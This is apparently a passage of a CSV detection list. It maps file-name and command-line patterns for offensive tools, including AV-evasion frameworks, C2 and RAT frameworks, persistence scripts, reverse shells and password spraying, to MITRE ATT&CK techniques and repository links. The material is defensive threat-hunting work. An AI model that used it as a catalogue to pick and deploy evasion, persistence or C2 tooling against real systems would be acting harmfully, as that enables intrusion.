+"*pe2sh.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*pe2shc.exe *","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z"
+"*pe2shc.exe*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*pe2shc_*.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*Pe2Shellcode.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*PEASS-ng-master*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*peCloak*","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","1","97","39","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z" +"*peinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*peinjector.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PELoader/PeLoader.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*pem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Pennyw0rth/NetExec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*-pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. 
repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PentestBox*","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PENTESTING-BIBLE*","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12397","2308","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z"
+"*pentest-machine*","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. 
Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","4","315","106","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z" +"*pentestmonkey*","offensive_tool_keyword","Github Username","github repo name - privileges exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PE-Obfuscator.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*PE-Obfuscator.git*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*PE-Obfuscator-main*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*Pepitoh*VBad*","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","6","511","134","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" +"*perfdata.portswigger.net*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PerfExec.sln*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*PerfExec-main.zip*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*Perform password spraying for all active users on a domain*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*Performing recursive ShadowSpray 
attack*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*perl nikto.pl -h*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","0","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*perl_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*perl-reverse-shell.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*PersAutorun.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PersCLRInstall.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*persist exceladdin*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*persist logonscript*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*persist run *hkcu*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*persist run *hklm*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*persist runkey*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*persist spe *.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Persist.cna*","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. 
Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","1","1","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" +"*Persist\autorun.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\eventviewer.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\powershell.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\screensaver.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\startup.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\winlogon.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence 
tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*PersistBOF.cna*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*Persistence.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*Persistence.exe*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - 
TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Persistence/InstallWMI*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Persistence_AccountManipulation_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_Guard_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
+"*Persistence_LogonScripts_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_NewService_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_OfficeApplicationStartup_OfficeTest.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_Other_WindowsLibraryMs.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which 
modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_RegistryRunKeys_SharpHide.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_RegistryRunKeys_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_ScheduledTask_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - 
